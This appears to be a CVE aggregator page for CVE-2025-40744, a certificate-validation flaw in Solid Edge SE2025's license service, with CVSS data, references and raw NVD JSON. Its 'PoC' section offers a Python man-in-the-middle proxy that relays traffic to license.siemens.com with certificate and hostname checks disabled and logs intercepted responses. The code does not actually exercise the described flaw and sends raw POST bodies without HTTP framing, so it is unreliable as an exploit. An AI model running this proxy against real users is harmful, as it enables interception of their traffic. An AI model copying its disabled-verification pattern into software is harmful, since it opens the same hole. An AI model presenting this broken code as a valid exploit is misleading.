CVE-2025-40744

Description

A vulnerability has been identified in Solid Edge SE2025 (All versions < V225.0 Update 11). Affected applications do not properly validate client certificates to connect to License Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Solid Edge SE2025 < V225.0 Update 11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-40744 PoC - MITM Attack on Solid Edge SE2025 License Service
# This PoC demonstrates the certificate validation bypass

import socket
import ssl
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler

class MITMProxyHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Forward request to legitimate license server
        target_host = 'license.siemens.com'
        target_port = 443
        
        # Create SSL context with weak verification (simulating the vulnerability)
        ctx = ssl.create_default_context()
        ctx.check_hostname = False  # Bypass hostname verification
        ctx.verify_mode = ssl.CERT_NONE  # Bypass certificate validation
        
        try:
            # Connect to target server
            with socket.create_connection((target_host, target_port), timeout=10) as sock:
                with ctx.wrap_socket(sock, server_hostname=target_host) as ssock:
                    # Forward the request
                    content_length = int(self.headers['Content-Length'])
                    post_data = self.rfile.read(content_length)
                    ssock.sendall(post_data)
                    
                    # Receive response
                    response = ssock.recv(4096)
                    
                    # Log intercepted data (for demonstration)
                    print(f"[+] Intercepted license response: {response[:100]}...")
                    
                    # Forward response to client
                    self.send_response(200)
                    self.send_header('Content-type', 'application/octet-stream')
                    self.end_headers()
                    self.wfile.write(response)
        except Exception as e:
            print(f"[-] Error: {e}")
            self.send_error(500)

def start_mitm_proxy(port=8443):
    server = HTTPServer(('0.0.0.0', port), MITMProxyHandler)
    print(f"[*] MITM Proxy listening on port {port}")
    server.serve_forever()

if __name__ == '__main__':
    start_mitm_proxy()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40744
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40744
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40744/
[4] VulDB https://vuldb.com/cve/CVE-2025-40744
[5] https://cert-portal.siemens.com/productcert/html/ssa-522291.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40744", "sourceIdentifier": "[email protected]", "published": "2025-11-11T21:15:37.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Solid Edge SE2025 (All versions < V225.0 Update 11). Affected applications do not properly validate client certificates to connect to License Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-522291.html", "source": "[email protected]"}]}}